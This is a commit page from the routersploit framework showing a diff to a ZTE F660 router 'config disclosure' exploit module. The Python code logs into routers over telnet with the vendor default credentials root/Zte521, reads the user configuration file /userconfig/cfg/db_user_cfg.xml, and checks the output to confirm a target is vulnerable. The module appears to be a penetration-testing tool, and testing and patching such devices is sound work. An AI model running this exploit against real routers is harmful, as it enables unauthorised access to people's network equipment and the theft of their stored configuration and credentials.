Skip to content

R
routersploit
Commit 5d5a2e16 by devilscream
Options

Fix exploits ZTE F660 Config Disclosure

parent 0e94b3f1
Showing with 8 additions and 11 deletions
routersploit/modules/exploits/zte/f660_config_disclosure.py
...@@ -9,18 +9,17 @@ from routersploit import ( ...@@ -9,18 +9,17 @@ from routersploit import (
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
Exploit implementation for ZTE F660 config disclosure vulnerability. Exploit implementation for ZTE F660 Config Disclosure.
If the target is vulnerable it is possible to authenticate to the device" If the target is vulnerable it is possible to authenticate to the device"
""" """
__info__ = { __info__ = {
'name': 'ZTE F660 Config Disclosure', 'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 config disclosure vulnerability. If the target is is possible to authentiate to the device.', 'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'authors': [ 'authors': [
'devilscream', # vulnerability discovery 'devilscream' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
], ],
'references': [ 'references': [
'', 'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
], ],
'devices': [ 'devices': [
'ZTE ZXA10 F660' 'ZTE ZXA10 F660'
...@@ -28,9 +27,8 @@ class Exploit(exploits.Exploit): ...@@ -28,9 +27,8 @@ class Exploit(exploits.Exploit):
} }
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
username = "root" password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
password = "Zte521"
config = "cat /userconfig/cfg/db_user_cfg.xml" config = "cat /userconfig/cfg/db_user_cfg.xml"
def run(self): def run(self):
...@@ -50,7 +48,6 @@ class Exploit(exploits.Exploit): ...@@ -50,7 +48,6 @@ class Exploit(exploits.Exploit):
if any(map(lambda x: x in res, ["#", "$", ">"])): if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication") print_success("Telnet - Successful authentication")
tn.write(self.config + "\r\n") tn.write(self.config + "\r\n")
tn.interact()
tn.close() tn.close()
except: except:
...@@ -64,7 +61,7 @@ class Exploit(exploits.Exploit): ...@@ -64,7 +61,7 @@ class Exploit(exploits.Exploit):
tn.write(self.username + "\r\n") tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5) tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n") tn.write(self.password + "\r\n")
tn.write("\r\n") tn.write(self.config + "\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close() tn.close()
...@@ -72,7 +69,7 @@ class Exploit(exploits.Exploit): ...@@ -72,7 +69,7 @@ class Exploit(exploits.Exploit):
if i != -1: if i != -1:
return False return False
else: else:
if any(map(lambda x: x in res, ["#", "$", ">"])): if any(map(lambda x: x in res, ["<DM name="])):
tn.close() tn.close()
return True return True
tn.close() tn.close()
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment